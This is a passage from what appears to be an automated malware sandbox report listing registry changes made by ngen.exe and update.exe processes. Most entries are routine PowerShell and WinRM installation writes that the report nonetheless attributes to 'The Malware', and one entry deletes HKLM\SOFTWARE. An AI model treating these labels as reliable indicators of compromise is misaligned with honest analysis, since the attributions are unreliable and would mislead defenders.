[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:4092 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 E8 E5 E6 6E 56 16 E5 B1 B5 5A 7B CD 9C CF 64"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3576 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA F6 B5 10 FC 5B 76 42 69 BA B0 31 09 DD 2A 29"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:492 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 F6 B9 0D 74 1B 72 54 00 4C 9B F4 43 41 C3 59"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:364 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 3A F9 1E 81 89 E4 4F 1E C1 86 DD 28 EF F2 F5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3628 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 43 A1 F3 A1 68 DC D8 7A 00 92 8F 58 CF 32 6E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3600 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 32 1B 15 6A F6 36 03 C3 41 74 C7 AC 30 C7 EA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5B 38 A9 8B 02 7F 4A 13 E2 B3 26 C2 42 DE 9E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3608 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 A8 C7 6B 9F 73 DE 91 7D EE C5 B6 5E 9B 6D E0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:1796 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 13 D0 73 EF AD 47 74 58 25 48 85 97 D7 8F D3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3524 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 BF A3 85 1A B4 42 15 67 A5 F2 93 97 0B 4C 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3644 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 3E 2A 39 28 CF 21 7F 7C 6B F3 11 6C 09 C1 AA"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3720 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C DB 2F 48 11 FC 47 A9 6D 4D ED 91 88 A3 64 A3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3704 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 19 E4 A8 62 37 71 B7 36 0A D0 AD B6 96 B7 11"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3560 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 58 B9 0D 8C F3 FA 8B 77 84 D8 80 96 D3 07 CC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3680 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 74 96 76 99 2E 96 4E 83 55 8C 35 7A 10 C1 F9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3548 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 49 58 84 58 76 BF 67 67 8F 92 2F 1D C2 9F 12"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process %original file name%.exe:792 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 F2 06 82 AD AC FC 07 E9 AC 29 A8 65 D4 FE 0C"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

The process update.exe:304 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
